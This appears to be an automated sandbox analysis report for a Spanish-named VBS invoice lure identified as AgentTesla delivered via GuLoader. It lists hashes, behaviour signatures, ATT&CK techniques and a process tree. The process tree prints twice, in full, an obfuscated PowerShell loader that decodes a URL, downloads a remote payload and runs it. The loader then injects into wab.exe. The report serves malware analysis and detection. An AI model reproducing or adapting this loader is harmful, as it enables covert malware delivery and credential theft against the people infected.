Analysis

  • max time kernel
    146s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-03-2024 06:59

General

  • Target

    FACTURAS PENDIENTES.vbs

  • Size

    37KB

  • MD5

    a22712d23b2775c205038a1ac865442a

  • SHA1

    131ffe41766faa1d9f7e54838f3419cd08480c1f

  • SHA256

    977965787ace76ed2ef7b9d8923958c46ceaefa46ec09ad2436f4b22b1b42513

  • SHA512

    f22828a540b59594f8f91278c41c578eb19fde3432c57ca90a0d5c756bafc87699ed547de92b4e48c5ba116b72bfec3acbcb2e31cbd66d687ebbe876024eb346

  • SSDEEP

    768:u0bgBGhARWAZGc8NnKwiQREsqf+KhjMFpd:AMAjqNnKw5UnJMFv

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FACTURAS PENDIENTES.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2876
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Udmatrikuleringers Electrometres outbargained Solepiece Unacclimatised #>;$Pesewas=(cmd /c set /A 115^^0);Function Enzo ([String]$Apostrofgcr){$Oosporangia=[char][int]$Pesewas+'ubstring';$Mahogniers=8;$Fldningstiderne=Statary($Apostrofgcr);For($Biliousness=7; $Biliousness -lt $Fldningstiderne; $Biliousness+=$Mahogniers){$Omredigerendes=$Apostrofgcr.$Oosporangia.Invoke($Biliousness, 1);$Landbrugserhvervs=$Landbrugserhvervs+$Omredigerendes;}$Landbrugserhvervs;}function Polyphloesboean ($mammocking){& ($Aflggende) ($mammocking);}function Statary ([String]$teknikumuddannede){$Sericocarpus=$teknikumuddannede.Length-1;$Sericocarpus;}$Bogorme=Enzo 'rotangeTG ldsmerBlotlggapreha.mnmaggieasRepumpefWidtabee Griff rHirplesrKighulni P.bliknGu.turag Ukaser ';$Roadfellow=Enzo 'YellowkhWackesbtEloinbutHall cipCircu asMrke ag:Phy iol/Undivid/By,teund Madelir Vid.reiEust chvCotypesehuemuls.Bronkosg Instano llestroOverknegregionplGadekaseFejlpla. RelikvcHoftesto Scrobimlasedeu/TrimpreuRedi ticBladn.n?Sprkkefe KoeksixRentenepEdgieroo T.ykker.isseket Undert=CirclerdTmmerfloBeachedwDegl.rynFeltprslOverboeoT.igramaBagassedRecsrne& DegnesiAfmeldedCrookle=Fyrfa,s1 Intervy.omogratDemibucw BizekoOBor erbCSu phobKSc,nesk0HomogenQSuperstjSoulycoRmoecksdqNitraniD.peculay Kolpo.tToxic lN.ranspoiAllo uyxCardinaJRa sejlbEtfagskoCatechiiarbejdeUCerebelvFutilisX NedganbMacrosp7Antitar3.ndiapa8 Snob d5 Ste hjSPliabil_Udby niXEffekti ';$Aflggende=Enzo 'algaeuni,richineOpdagelxNyttesl ';$Mediaevalism253=Enzo 'R,alise$ aversig vrulerl cleddeoCopulabbInsect,a BagovelPe,mitt:HemisfrRlsebogeifrapletiGteskabtCant batStoppenaDagpengsKonteks aaderu=Akkompa Gl,varmSLeathertUncausaaBronchorCandidutBereami-GuldgraBB ginniiPis aritKlummetsStat,gaTNovemlorSkallesa,abrican Pr.fersuninervfKonstaneKirvegirForevie Dobbelt- InternSUdskuddo Kab alu,egenderTarrab.cS rmpebe Regali Unmed.l$K.tymeuRGopherso Uns apaRecitind OligidfFilhaanebouleval Stylo.lBilulykoPietet.wF orist Revisi-InkompeD PretrieChainsmsAvuncultD abbliiCraniosnNattetiaAswou htTidendeiki eseroEnkeltfn Iglern ,hilarc$Ev cuanOPewte,efSkolemsfOverawieIndjag.nRelat.vdOprej niKnoklennShrimpygHieroso ';Polyphloesboean (Enzo 'Slumarb$SmudsetgHe,litelSlval,eoPerfectbBulenpoaZygoplel Artifi: ,oxinfOHydriadf Molbohf Bhutane bestjanCommoned pengepi Di coln Kolle,gEngastr= Stigni$ TetarteTeoribonMo,andevBlreslw:AfrusteaSashaysp astlanpHusholdd Fool caknarksutKi.gpinaUrba.is ') ;Polyphloesboean (Enzo 'AgnbillILystop,mVidvinkpAecid ooTrolddorHeterost Nonper- acerbiMAgoranooNedsaetdRejsbreuGlobalsl Ka.toteYancean Niv.aulBAu opoli ,laniltFlerfa.sSkindedTShowancr,sblomsaOrdknapnPrincips Oppassf DeammoeKasha,or Tyngsl ') ;$Offending=$Offending+'\Jagtsson.unh' ;Polyphloesboean (Enzo 'Pro.ram$Del,mesg M stnklRog fisoskraalhb ,tjerna AcustolBarbari:ChamoliA ForefalGamboleeQuaichemFlatteroKlippevnParcellgu sweeteShe.ardrOverrel=Lovligg(SagadigT Shank,eColumnis WorkbatLnsyste-Compu ePLuskesraPraediutP.aneroh Genera Skalker$RiddersOAfgrderf banansfVra gviePicayunnSau.orndOrga isi PhocaenSvrdlilgantiblu)Zonelov ') ;while (-not $Alemonger) {Polyphloesboean (Enzo 'TraneboIAntipatfRensels Nea.der(benpibe$PentangRDicranaiPuju aniLyma.trtDenie,etNed,urdaPalustrsLagres..IncrimiJEozoontoUnsup lbact.nidSCerc,ditProstitaAcknowltMatinmxeSolkurv Hjlpel -Frita,eeObstinaqAg misr J,rdska$SydvestBNegerino M rkergBeskaffo Unim.rrAffaldsmYdervgseAsp.ran)Haserne Anastom{ FruiteSGynarcht ApodeiaUnhuskerHelgardtDrillab- g,mmibSDermatolApprox,eKlippeee,etinalpUndicta Interan1Disab,l}Sko emneAkkileslKolportsDogmef.eBrerena{NytteomSCompacttHasteinaTabubelrDimplintTheolog-DiscernSMiswritlEriophoe Civi.ie EleuthpPanomph Ekspe.i1 Profor;,ldningPY.erforoV.sicullRepleviyKick,esp Nowlseh evelatlultimatoToiletpe pportescycadalbPapay.uoGjordeneCeratoba .heraonUnderst Miscomf$Tyrk.reMphy ochePropri dblund,ni P,ragra,pshutieJigg,tivIngenirapublicilSuperimiMarksmasSmkfornmStartng2O,densf5genvlge3 Sahli }Summens ');Polyphloesboean (Enzo 'Agnosti$OutrootgEffer,nlJudaiseo MormonbPaahngsa Dosm rldagpaaf:SengefoAKoldbralLensbreeDidrichmBrugersoChaetocnTitaniugForjtteeFanoundr Origin=Anachro(Elysiu,T Ov rhoe.ndandlswh,tchytUnder,r-NonsuchPBeachdraSulfuratSupererhTingtan Melili$TekstreOps udobfLejrudsfCentesie SmaragnSillcocdsn digeiDyrekrenHimmellgAntenne) Pr fan ') ;}Polyphloesboean (Enzo ' Camera$EupepsighattieslSk bberoBrobumubYouthfua InductlBlo,pls:AutoxidoKnallerpm rishagtydend aMisshapvretrogrePaafl,ep TyphloeStoppekrDoughboioplaerio NondetdPugm.rkeProtektrAnarth,nBilbr.neExcentr Styrets=P.odukt SpecimGSkarlateSelskabttsktske-GreenteCridgepioBgedesanGravelltReim,rie Antan nSanselitDelega Std.ri$ MartyrOUdvid.lf A.lokafJavanuner,gnskanBasemend.attindibilassinU.tradogPaahvil ');Polyphloesboean (Enzo 'Krniken$,oodlumg Du endlViverr oAttestebBrd,lova FanekolMedle.s:HaarskslW eatypeTyfonkor OplgshnAmtsgrnaOffdayeeElec.roaUnsur i Partisa=Unbeh.a Sgneh l[PhlegmaSAmadavayHeterocsRntge otSu,sexmePalpeb mKassere.ImaginaCBilletaoMandtimnRulle kvSup rineHempierrSkulde,t.abinet]skaberi:Unfeari: UpridgFchertierFringeloLopperemCylind.BHegemonaNorthersjesu,tieFrenchi6Cognize4.eallnsS Sko fotRe.ysber E epsiiSkatkamnOve,rapgManic r(Diff,re$HomeworoheterompRetravegXdc rcuaSkuldervTilb gee PrcisepReen.nce,nnelenr SiameliStr elsoFabriksdFremlejeLe,torerCounte.nAfg.aneeFlodd.m)Tekno,o ');Polyphloesboean (Enzo 'Stivels$DanskamgKlarhovlremeditoSmrskeebSplittea KrvedelIdrifts:RamdohrpOptagneoRveka erSipho.aeMoralitrPrac icnPtomatreIntensisPeasygi Comme =Ptyalin Transmu[ Urkom,SC amperyBffebygs HovedstErgataneEksportmStaldfi.HalvlegTJaunceceSansculx,olkedotDuk.ehu.CodicalELaanekonSydv.stcJolandeoArkfdnid Heart i AltergnRhesusngKortslu]Bismage:S.enogr: ipotroAAwareneSAbscissC.eserteI UdpantIUdpegni.MelteigGKaolineeMicrodetDeodateSRegns.at G odwirMeteoriiHandelsn Augu,tgInterde(Natatio$TempoetlBrunje eMandelsr igsstanBatchkoaOvertypeStikkelaProstem)Slesvig ');Polyphloesboean (Enzo 'Fumigat$Skorsteg RaakoslEuclideoMarian.bUnilateaBio eknlOperati:.ikkerhMRevisorihjlpemolSmalkoslAkte,sbsUnclu tt HenvenoBrdristn,iscomeeAp,riessOrdnens=Subnode$CognizapScrunchoBssebarr ,jerteeNest.rirPect senNonulc.ecrepehasTransfe.Light.osLinaceauPseudovbJ.nskygsSowarcet.orbeter TreposiAnticorn Hjemmeg Jura.e( Zagged3Aspirer1Inspice4Videoba9Garrupa7Monstra2Shareow, Storsl3Feather1Stersba0 Dupab 9Nondis.9Infusiv)Thewies ');Polyphloesboean $Millstones;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1696
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:3140
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Udmatrikuleringers Electrometres outbargained Solepiece Unacclimatised #>;$Pesewas=(cmd /c set /A 115^^0);Function Enzo ([String]$Apostrofgcr){$Oosporangia=[char][int]$Pesewas+'ubstring';$Mahogniers=8;$Fldningstiderne=Statary($Apostrofgcr);For($Biliousness=7; $Biliousness -lt $Fldningstiderne; $Biliousness+=$Mahogniers){$Omredigerendes=$Apostrofgcr.$Oosporangia.Invoke($Biliousness, 1);$Landbrugserhvervs=$Landbrugserhvervs+$Omredigerendes;}$Landbrugserhvervs;}function Polyphloesboean ($mammocking){& ($Aflggende) ($mammocking);}function Statary ([String]$teknikumuddannede){$Sericocarpus=$teknikumuddannede.Length-1;$Sericocarpus;}$Bogorme=Enzo 'rotangeTG ldsmerBlotlggapreha.mnmaggieasRepumpefWidtabee Griff rHirplesrKighulni P.bliknGu.turag Ukaser ';$Roadfellow=Enzo 'YellowkhWackesbtEloinbutHall cipCircu asMrke ag:Phy iol/Undivid/By,teund Madelir Vid.reiEust chvCotypesehuemuls.Bronkosg Instano llestroOverknegregionplGadekaseFejlpla. RelikvcHoftesto Scrobimlasedeu/TrimpreuRedi ticBladn.n?Sprkkefe KoeksixRentenepEdgieroo T.ykker.isseket Undert=CirclerdTmmerfloBeachedwDegl.rynFeltprslOverboeoT.igramaBagassedRecsrne& DegnesiAfmeldedCrookle=Fyrfa,s1 Intervy.omogratDemibucw BizekoOBor erbCSu phobKSc,nesk0HomogenQSuperstjSoulycoRmoecksdqNitraniD.peculay Kolpo.tToxic lN.ranspoiAllo uyxCardinaJRa sejlbEtfagskoCatechiiarbejdeUCerebelvFutilisX NedganbMacrosp7Antitar3.ndiapa8 Snob d5 Ste hjSPliabil_Udby niXEffekti ';$Aflggende=Enzo 'algaeuni,richineOpdagelxNyttesl ';$Mediaevalism253=Enzo 'R,alise$ aversig vrulerl cleddeoCopulabbInsect,a BagovelPe,mitt:HemisfrRlsebogeifrapletiGteskabtCant batStoppenaDagpengsKonteks aaderu=Akkompa Gl,varmSLeathertUncausaaBronchorCandidutBereami-GuldgraBB ginniiPis aritKlummetsStat,gaTNovemlorSkallesa,abrican Pr.fersuninervfKonstaneKirvegirForevie Dobbelt- InternSUdskuddo Kab alu,egenderTarrab.cS rmpebe Regali Unmed.l$K.tymeuRGopherso Uns apaRecitind OligidfFilhaanebouleval Stylo.lBilulykoPietet.wF orist Revisi-InkompeD PretrieChainsmsAvuncultD abbliiCraniosnNattetiaAswou htTidendeiki eseroEnkeltfn Iglern ,hilarc$Ev cuanOPewte,efSkolemsfOverawieIndjag.nRelat.vdOprej niKnoklennShrimpygHieroso ';Polyphloesboean (Enzo 'Slumarb$SmudsetgHe,litelSlval,eoPerfectbBulenpoaZygoplel Artifi: ,oxinfOHydriadf Molbohf Bhutane bestjanCommoned pengepi Di coln Kolle,gEngastr= Stigni$ TetarteTeoribonMo,andevBlreslw:AfrusteaSashaysp astlanpHusholdd Fool caknarksutKi.gpinaUrba.is ') ;Polyphloesboean (Enzo 'AgnbillILystop,mVidvinkpAecid ooTrolddorHeterost Nonper- acerbiMAgoranooNedsaetdRejsbreuGlobalsl Ka.toteYancean Niv.aulBAu opoli ,laniltFlerfa.sSkindedTShowancr,sblomsaOrdknapnPrincips Oppassf DeammoeKasha,or Tyngsl ') ;$Offending=$Offending+'\Jagtsson.unh' ;Polyphloesboean (Enzo 'Pro.ram$Del,mesg M stnklRog fisoskraalhb ,tjerna AcustolBarbari:ChamoliA ForefalGamboleeQuaichemFlatteroKlippevnParcellgu sweeteShe.ardrOverrel=Lovligg(SagadigT Shank,eColumnis WorkbatLnsyste-Compu ePLuskesraPraediutP.aneroh Genera Skalker$RiddersOAfgrderf banansfVra gviePicayunnSau.orndOrga isi PhocaenSvrdlilgantiblu)Zonelov ') ;while (-not $Alemonger) {Polyphloesboean (Enzo 'TraneboIAntipatfRensels Nea.der(benpibe$PentangRDicranaiPuju aniLyma.trtDenie,etNed,urdaPalustrsLagres..IncrimiJEozoontoUnsup lbact.nidSCerc,ditProstitaAcknowltMatinmxeSolkurv Hjlpel -Frita,eeObstinaqAg misr J,rdska$SydvestBNegerino M rkergBeskaffo Unim.rrAffaldsmYdervgseAsp.ran)Haserne Anastom{ FruiteSGynarcht ApodeiaUnhuskerHelgardtDrillab- g,mmibSDermatolApprox,eKlippeee,etinalpUndicta Interan1Disab,l}Sko emneAkkileslKolportsDogmef.eBrerena{NytteomSCompacttHasteinaTabubelrDimplintTheolog-DiscernSMiswritlEriophoe Civi.ie EleuthpPanomph Ekspe.i1 Profor;,ldningPY.erforoV.sicullRepleviyKick,esp Nowlseh evelatlultimatoToiletpe pportescycadalbPapay.uoGjordeneCeratoba .heraonUnderst Miscomf$Tyrk.reMphy ochePropri dblund,ni P,ragra,pshutieJigg,tivIngenirapublicilSuperimiMarksmasSmkfornmStartng2O,densf5genvlge3 Sahli }Summens ');Polyphloesboean (Enzo 'Agnosti$OutrootgEffer,nlJudaiseo MormonbPaahngsa Dosm rldagpaaf:SengefoAKoldbralLensbreeDidrichmBrugersoChaetocnTitaniugForjtteeFanoundr Origin=Anachro(Elysiu,T Ov rhoe.ndandlswh,tchytUnder,r-NonsuchPBeachdraSulfuratSupererhTingtan Melili$TekstreOps udobfLejrudsfCentesie SmaragnSillcocdsn digeiDyrekrenHimmellgAntenne) Pr fan ') ;}Polyphloesboean (Enzo ' Camera$EupepsighattieslSk bberoBrobumubYouthfua InductlBlo,pls:AutoxidoKnallerpm rishagtydend aMisshapvretrogrePaafl,ep TyphloeStoppekrDoughboioplaerio NondetdPugm.rkeProtektrAnarth,nBilbr.neExcentr Styrets=P.odukt SpecimGSkarlateSelskabttsktske-GreenteCridgepioBgedesanGravelltReim,rie Antan nSanselitDelega Std.ri$ MartyrOUdvid.lf A.lokafJavanuner,gnskanBasemend.attindibilassinU.tradogPaahvil ');Polyphloesboean (Enzo 'Krniken$,oodlumg Du endlViverr oAttestebBrd,lova FanekolMedle.s:HaarskslW eatypeTyfonkor OplgshnAmtsgrnaOffdayeeElec.roaUnsur i Partisa=Unbeh.a Sgneh l[PhlegmaSAmadavayHeterocsRntge otSu,sexmePalpeb mKassere.ImaginaCBilletaoMandtimnRulle kvSup rineHempierrSkulde,t.abinet]skaberi:Unfeari: UpridgFchertierFringeloLopperemCylind.BHegemonaNorthersjesu,tieFrenchi6Cognize4.eallnsS Sko fotRe.ysber E epsiiSkatkamnOve,rapgManic r(Diff,re$HomeworoheterompRetravegXdc rcuaSkuldervTilb gee PrcisepReen.nce,nnelenr SiameliStr elsoFabriksdFremlejeLe,torerCounte.nAfg.aneeFlodd.m)Tekno,o ');Polyphloesboean (Enzo 'Stivels$DanskamgKlarhovlremeditoSmrskeebSplittea KrvedelIdrifts:RamdohrpOptagneoRveka erSipho.aeMoralitrPrac icnPtomatreIntensisPeasygi Comme =Ptyalin Transmu[ Urkom,SC amperyBffebygs HovedstErgataneEksportmStaldfi.HalvlegTJaunceceSansculx,olkedotDuk.ehu.CodicalELaanekonSydv.stcJolandeoArkfdnid Heart i AltergnRhesusngKortslu]Bismage:S.enogr: ipotroAAwareneSAbscissC.eserteI UdpantIUdpegni.MelteigGKaolineeMicrodetDeodateSRegns.at G odwirMeteoriiHandelsn Augu,tgInterde(Natatio$TempoetlBrunje eMandelsr igsstanBatchkoaOvertypeStikkelaProstem)Slesvig ');Polyphloesboean (Enzo 'Fumigat$Skorsteg RaakoslEuclideoMarian.bUnilateaBio eknlOperati:.ikkerhMRevisorihjlpemolSmalkoslAkte,sbsUnclu tt HenvenoBrdristn,iscomeeAp,riessOrdnens=Subnode$CognizapScrunchoBssebarr ,jerteeNest.rirPect senNonulc.ecrepehasTransfe.Light.osLinaceauPseudovbJ.nskygsSowarcet.orbeter TreposiAnticorn Hjemmeg Jura.e( Zagged3Aspirer1Inspice4Videoba9Garrupa7Monstra2Shareow, Storsl3Feather1Stersba0 Dupab 9Nondis.9Infusiv)Thewies ');Polyphloesboean $Millstones;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2008
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:4240
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3016

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Command and Control

      Web Service

      1
      T1102

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2rzk1eap.1wy.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/1696-35-0x00007FFD10420000-0x00007FFD10EE1000-memory.dmp
        Filesize

        10.8MB

      • memory/1696-10-0x00007FFD10420000-0x00007FFD10EE1000-memory.dmp
        Filesize

        10.8MB

      • memory/1696-11-0x0000021915F90000-0x0000021915FA0000-memory.dmp
        Filesize

        64KB

      • memory/1696-12-0x0000021915F90000-0x0000021915FA0000-memory.dmp
        Filesize

        64KB

      • memory/1696-13-0x0000021930BB0000-0x0000021930BD6000-memory.dmp
        Filesize

        152KB

      • memory/1696-14-0x0000021930C20000-0x0000021930C34000-memory.dmp
        Filesize

        80KB

      • memory/1696-88-0x00007FFD10420000-0x00007FFD10EE1000-memory.dmp
        Filesize

        10.8MB

      • memory/1696-45-0x0000021915F90000-0x0000021915FA0000-memory.dmp
        Filesize

        64KB

      • memory/1696-0-0x00000219306C0000-0x00000219306E2000-memory.dmp
        Filesize

        136KB

      • memory/1696-37-0x0000021915F90000-0x0000021915FA0000-memory.dmp
        Filesize

        64KB

      • memory/1696-36-0x0000021915F90000-0x0000021915FA0000-memory.dmp
        Filesize

        64KB

      • memory/2008-44-0x0000000007200000-0x0000000007214000-memory.dmp
        Filesize

        80KB

      • memory/2008-50-0x00000000747D0000-0x0000000074F80000-memory.dmp
        Filesize

        7.7MB

      • memory/2008-22-0x00000000056B0000-0x0000000005716000-memory.dmp
        Filesize

        408KB

      • memory/2008-32-0x0000000005720000-0x0000000005A74000-memory.dmp
        Filesize

        3.3MB

      • memory/2008-33-0x0000000005D10000-0x0000000005D2E000-memory.dmp
        Filesize

        120KB

      • memory/2008-34-0x0000000005D40000-0x0000000005D8C000-memory.dmp
        Filesize

        304KB

      • memory/2008-20-0x0000000004E30000-0x0000000004E52000-memory.dmp
        Filesize

        136KB

      • memory/2008-19-0x0000000004FA0000-0x00000000055C8000-memory.dmp
        Filesize

        6.2MB

      • memory/2008-18-0x0000000004960000-0x0000000004970000-memory.dmp
        Filesize

        64KB

      • memory/2008-38-0x00000000076E0000-0x0000000007D5A000-memory.dmp
        Filesize

        6.5MB

      • memory/2008-39-0x00000000062F0000-0x000000000630A000-memory.dmp
        Filesize

        104KB

      • memory/2008-40-0x0000000006FA0000-0x0000000007036000-memory.dmp
        Filesize

        600KB

      • memory/2008-41-0x0000000006F30000-0x0000000006F52000-memory.dmp
        Filesize

        136KB

      • memory/2008-42-0x0000000007D60000-0x0000000008304000-memory.dmp
        Filesize

        5.6MB

      • memory/2008-43-0x00000000071A0000-0x00000000071C2000-memory.dmp
        Filesize

        136KB

      • memory/2008-17-0x00000000023E0000-0x0000000002416000-memory.dmp
        Filesize

        216KB

      • memory/2008-16-0x0000000004960000-0x0000000004970000-memory.dmp
        Filesize

        64KB

      • memory/2008-46-0x0000000004960000-0x0000000004970000-memory.dmp
        Filesize

        64KB

      • memory/2008-47-0x0000000007440000-0x0000000007441000-memory.dmp
        Filesize

        4KB

      • memory/2008-48-0x0000000008310000-0x0000000008D61000-memory.dmp
        Filesize

        10.3MB

      • memory/2008-49-0x0000000008310000-0x0000000008D61000-memory.dmp
        Filesize

        10.3MB

      • memory/2008-21-0x0000000005640000-0x00000000056A6000-memory.dmp
        Filesize

        408KB

      • memory/2008-52-0x0000000004960000-0x0000000004970000-memory.dmp
        Filesize

        64KB

      • memory/2008-53-0x00000000771F1000-0x0000000077311000-memory.dmp
        Filesize

        1.1MB

      • memory/2008-15-0x00000000747D0000-0x0000000074F80000-memory.dmp
        Filesize

        7.7MB

      • memory/2008-55-0x0000000004960000-0x0000000004970000-memory.dmp
        Filesize

        64KB

      • memory/2008-83-0x0000000008310000-0x0000000008D61000-memory.dmp
        Filesize

        10.3MB

      • memory/2008-80-0x00000000747D0000-0x0000000074F80000-memory.dmp
        Filesize

        7.7MB

      • memory/2008-67-0x0000000008310000-0x0000000008D61000-memory.dmp
        Filesize

        10.3MB

      • memory/3016-82-0x00000000747D0000-0x0000000074F80000-memory.dmp
        Filesize

        7.7MB

      • memory/3016-85-0x0000000001E40000-0x0000000002891000-memory.dmp
        Filesize

        10.3MB

      • memory/3016-79-0x00000000771F1000-0x0000000077311000-memory.dmp
        Filesize

        1.1MB

      • memory/3016-57-0x00000000771F1000-0x0000000077311000-memory.dmp
        Filesize

        1.1MB

      • memory/3016-81-0x0000000000BE0000-0x0000000000C22000-memory.dmp
        Filesize

        264KB

      • memory/3016-56-0x0000000077278000-0x0000000077279000-memory.dmp
        Filesize

        4KB

      • memory/3016-78-0x0000000000BE0000-0x0000000001E34000-memory.dmp
        Filesize

        18.3MB

      • memory/3016-84-0x00000000200B0000-0x00000000200C0000-memory.dmp
        Filesize

        64KB

      • memory/3016-74-0x0000000000BE0000-0x0000000001E34000-memory.dmp
        Filesize

        18.3MB

      • memory/3016-54-0x0000000001E40000-0x0000000002891000-memory.dmp
        Filesize

        10.3MB

      • memory/3016-90-0x0000000020600000-0x0000000020650000-memory.dmp
        Filesize

        320KB

      • memory/3016-91-0x0000000020CC0000-0x0000000020D52000-memory.dmp
        Filesize

        584KB

      • memory/3016-92-0x0000000020650000-0x000000002065A000-memory.dmp
        Filesize

        40KB

      • memory/3016-94-0x00000000747D0000-0x0000000074F80000-memory.dmp
        Filesize

        7.7MB

      • memory/3016-96-0x00000000200B0000-0x00000000200C0000-memory.dmp
        Filesize

        64KB